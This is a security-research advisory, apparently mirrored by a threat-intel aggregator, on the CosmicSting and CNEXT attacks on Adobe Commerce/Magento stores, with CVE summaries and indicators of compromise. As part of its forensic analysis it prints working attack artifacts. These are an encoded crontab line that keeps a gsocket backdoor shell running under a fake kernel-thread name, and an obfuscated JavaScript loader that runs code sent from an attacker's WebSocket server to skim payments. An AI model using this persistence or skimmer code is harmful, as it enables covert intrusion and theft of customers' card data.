ZeroHour
Sansec (Magento / e-commerce security)published ()ingested Sansec Forensics Team

Persistent backdoors injected on Adobe Commerce via new CosmicSting attack

criticalMalware exploited in the wildimportance 60CVE-2024-34102CVE-2024-2961CVE-2026-75650

Vulnerabilities mentionedAll →

CVEVulnerabilityCVSSEPSSFlagsAffectedExposurePublished
CVE-2024-2961
The iconv() function in the GNU C Library versions 2.39 and older may overflow the output buffer passed to it by up to 4 bytes when converting strings to the IS

The iconv() function in the GNU C Library versions 2.39 and older may overflow the output buffer passed to it by up to 4 bytes when converting strings to the ISO-2022-CN-EXT character set, which may be used to crash an application or overwrite a neighbouring variable.

NVD description · AI analysis pending
7.388%
  • gnu glibc
  • gnu active iq unified manager
  • gnu debian linux
  • +1 more
CVE-2024-34102
XXE vulnerability enabling RCE in Adobe Commerce and Magento Open Source

CVE-2024-34102 is an improper restriction of XML external entity reference (XXE) vulnerability (CWE-611) in Adobe Commerce and Magento Open Source, where the platform does not properly restrict external entities when processing XML, so an attacker who can submit crafted XML containing external entity references can have it parsed with attacker-controlled resources. XXE flaws classically enable local file disclosure and server-side request forgery, and in this case Adobe states the flaw allows remote code execution on the affected server. Any organization running a vulnerable Adobe Commerce or Magento Open Source storefront is affected, and because these are internet-facing e-commerce platforms that routinely process XML input, exposure is likely to be broad. The vulnerability was added to CISA's Known Exploited Vulnerabilities catalog on 2024-07-17, confirming exploitation in the wild, and its EPSS score of ~100% (100th percentile) indicates near-certain near-term exploitation activity; no public proof-of-concept is known and CVSS has not yet been scored. CISA lists ransomware use as unknown, so a ransomware connection should not be assumed.

Do: Apply Adobe's security updates for Adobe Commerce and Magento Open Source per the vendor's June 2024 advisory (APSB24-40), or, per the CISA KEV required action, apply vendor-recommended mitigations or discontinue use of the product if patches are unavailable. Review any endpoints or integrations that accept XML from untrusted users and hunt for signs of XXE exploitation, such as unexpected outbound requests, anomalous file reads, or webshell artifacts. Continue monitoring Adobe and CISA KEV for updated mitigation guidance and remediation deadlines.

9.8100% KEV PoC
  • Adobe Commerce
  • Adobe Magento Open Source
mass≈150,000+ storefronts (public technology scans report on the order of 100k-250k live Magento-based sites)
CVE-2026-75650
Unauthenticated Template Injection RCE in Adobe Commerce and Magento (CVE-2026-75650)

Adobe Commerce and Magento (including Adobe Commerce B2B) contain an improper neutralization of special elements used in a template engine (CWE-1336), a template-injection flaw that permits arbitrary code execution in the context of the current user. The flaw is reachable over the network by unauthenticated attackers, requires no user interaction, and its changed scope (CVSS 3.1 S:C) means injected code executes beyond the vulnerable component, producing a maximum-severity (CVSS 10.0) remote code execution condition. A successful attacker gains arbitrary code execution on the storefront server; in the observed campaign, intruders installed a Rust backdoor and a PHP web shell (dubbed 'StyleSmuggler') on compromised servers. Any organization running an Adobe Commerce, Adobe Commerce B2B, or Magento storefront is in scope, with internet-facing e-commerce deployments most exposed. Exploitation is confirmed in the wild: the bug was abused as a zero-day before patching and was added to CISA's Known Exploited Vulnerabilities catalog on 2026-09-08.

Do: Apply Adobe's released patches immediately per vendor instructions, prioritizing internet-facing Commerce/Magento storefronts, and ensure compliance with CISA BOD 26-04 timelines for KEV entries. Hunt for 'StyleSmuggler' indicators of compromise, including unexpected Rust backdoor binaries and PHP web shells on hosts, and review template/theme customizations for tampering. Exact fixed version numbers are not included in the available data, so consult Adobe's advisory for the correct patched release for your Commerce/Magento version line.

10.02% KEV PoC
  • Adobe Commerce
  • Adobe Commerce B2B
  • Adobe Magento (open-source)
massroughly 100,000-300,000 internet-facing storefronts

Indicators of compromiseAll →

TypeIndicatorContext
ipv4165.231.182.981bmN0 uY29uZmlnL2h0b3AvZGVmdW5jd LmNvbmZpZy9odG9wL2RlZnVuY3 165.231.182.98 45.10.160.45 193.93.193.74 Read more CosmicSting attack & d
ipv4193.93.193.74itation Logs reveal attempts to exploit this vulnerability: 193.93.193.74, ::1 - - [09/Aug/2024:00:24:42 +0200] "POST /rest/all/V1/gu
ipv445.10.160.45L2h0b3AvZGVmdW5jd LmNvbmZpZy9odG9wL2RlZnVuY3 165.231.182.98 45.10.160.45 193.93.193.74 Read more CosmicSting attack & defense overvi
Full article611 words · extracted from sansec.io · click to collapse

CosmicSting (CVE-2024-34102) allows arbitrary file reading on unpatched systems. When combined with CNEXT (CVE-2024-2961), threat actors can escalate to remote code execution, taking over the entire system. Merchants must patch their systems against both vulnerabilities immediately. Refer to Adobe's troubleshooting guide to mitigate the issue in Adobe Commerce/Magento. We offer a standalone tool for detecting CNEXT.

Exploitation

Logs reveal attempts to exploit this vulnerability:

193.93.193.74, ::1 - - [09/Aug/2024:00:24:42 +0200] "POST /rest/all/V1/guest-carts/test-ambio/estimate-shipping-methods HTTP/1.1" 404 118 "-" "python-requests/2.32.3"
193.93.193.74, ::1 - - [09/Aug/2024:00:24:45 +0200] "POST /rest/all/V1/guest-carts/test-ambio/estimate-shipping-methods HTTP/1.1" 404 118 "-" "python-requests/2.32.3"
193.93.193.74, ::1 - - [09/Aug/2024:00:25:18 +0200] "POST /rest/all/V1/guest-carts/test-ambio/estimate-shipping-methods HTTP/1.1" 504 247 "-" "python-requests/2.32.3"

Notably, the attackers haven't even bothered to change the default test-ambio cart ID from the original Ambionics exploit.

It's important to note that despite the 4xx and 5xx status codes, successful exploitation can still occur.

Backdoor and Persistence

Once the attackers gain a foothold, they first drop two malicious files in ~/.config/htop named defunct and defunct.dat.

Afterwards, the following entry is added to the system's crontab:

# DO NOT REMOVE THIS LINE. SEED PRNG. #defunct-kernel
0 * * * * { echo L3Vzci9iaW4vcGtpbGwgLTAgLVUxMDA0IGRlZnVuY3QgMj4vZGV2L251bGwgfHwgU0hFTEw9L2Jpbi9iYXNoIFRFUk09eHRlcm0tMjU2Y29sb3IgR1NfQVJHUz0iLWsgL3Zhci93d3cvdmhvc3RzLzxTTklQPi8uY29uZmlnL2h0b3AvZGVmdW5jdC5kYXQgLWxpcUQiIC91c3IvYmluL2Jhc2ggLWMgImV4ZWMgLWEgJ1tyYWlkNXdxXScgJy92YXIvd3d3L3Zob3N0cy88U05JUD4vLmNvbmZpZy9odG9wL2RlZnVuY3QnIiAyPi9kZXYvbnVsbAo|base64 -d|bash;} 2>/dev/null #1b5b324a50524e47 >/dev/random # seed prng defunct-kernel

This crontab entry, which runs hourly, decodes to:

/usr/bin/pkill -0 -U1004 defunct 2>/dev/null || SHELL=/bin/bash TERM=xterm-256color GS_ARGS="-k /var/www/vhosts/<SNIP>/.config/htop/defunct.dat -liqD" /usr/bin/bash -c "exec -a '[raid5wq]' '/var/www/vhosts/<SNIP>/.config/htop/defunct'" 2>/dev/null

This script ensures the defunct process is always running, masquerading as a kernel thread named [raid5wq]. Observed process names include [kswapd0], [slub_flushwq], [card0-crtc8], [netns] and others.

The binary file dropped in ~/.config/htop/defunct is identified as gsocket. The Global Socket Toolkit facilitates peer-to-peer TCP connections, even through NAT/Firewalls, using end-to-end encryption and a relay network. Its TOR support makes it particularly attractive for malicious actors seeking anonymity.

Several options are passed to gsocket:

  • The ~/.config/htop/defunct.dat file contains the secret used to establish a secure connection and is passed as -k.
  • The remaining options -liqD ensure that a quiet interactive server shell is spawned in daemon mode.

This allows the attackers to maintain persistent, covert access to the compromised system.

Websocket Injection

Like all Magecart attacks, these are financially motivated. We've observed the following scripts being added to the store's header:

const xcmw = [93,89,89,16,5,5,89,79,70,70,79,88,89,94,75,94,4,89,67,94,79,5,93,89,89,21,89,69,95,88,73,79,23];
const tpkd = 42;
window.ww = new WebSocket(String.fromCharCode(...xcmw.map(hnax => hnax ^ tpkd)) + encodeURIComponent(location.href));
window.ww.addEventListener('message', event => {new Function(event.data)()});

This script establishes a WebSocket connection to wss://sellerstat.site/wss and executes any JavaScript received from the attacker. The domains and payloads delivered via the websocket differ between affected stores but always aims to steal customer payment data through various injection techniques. By leveraging this real-time communication channel, attackers can dynamically adapt their payloads, making detection and mitigation significantly more challenging.

Indicators of Compromise

wss://accept.bar/common
wss://amocha.xyz/common
wss://cdn-webstats.com/ls
wss://clearnetfab.net/common
wss://fallodick87-78.sbs/common
wss://cd.iconstaff.top/m
wss://cdn.iconstaff.top/common
wss://cdn.inspectdlet.net/ws
wss://jqueryuslibs.com/common
wss://jstatic201.com/common
wss://lererikal.org/common
wss://mamatmavali.ru/common
wss://nothingillegal.bond/common
wss://paie-locli.com/s
wss://sellerstat.site/wss
wss://statsseo.com/common
wss://statstoday.org/common
wss://vincaolet.xyz/socket
wss://webexcelsior.org/common
5jb25maWcvaHRvcC9kZWZ1bmN0
uY29uZmlnL2h0b3AvZGVmdW5jd
LmNvbmZpZy9odG9wL2RlZnVuY3
165.231.182.98
45.10.160.45
193.93.193.74

Read more

Text extracted automatically; images, tables and formatting may be missing. Original: https://sansec.io/research/cosmicsting-cnext-persistent-backdoor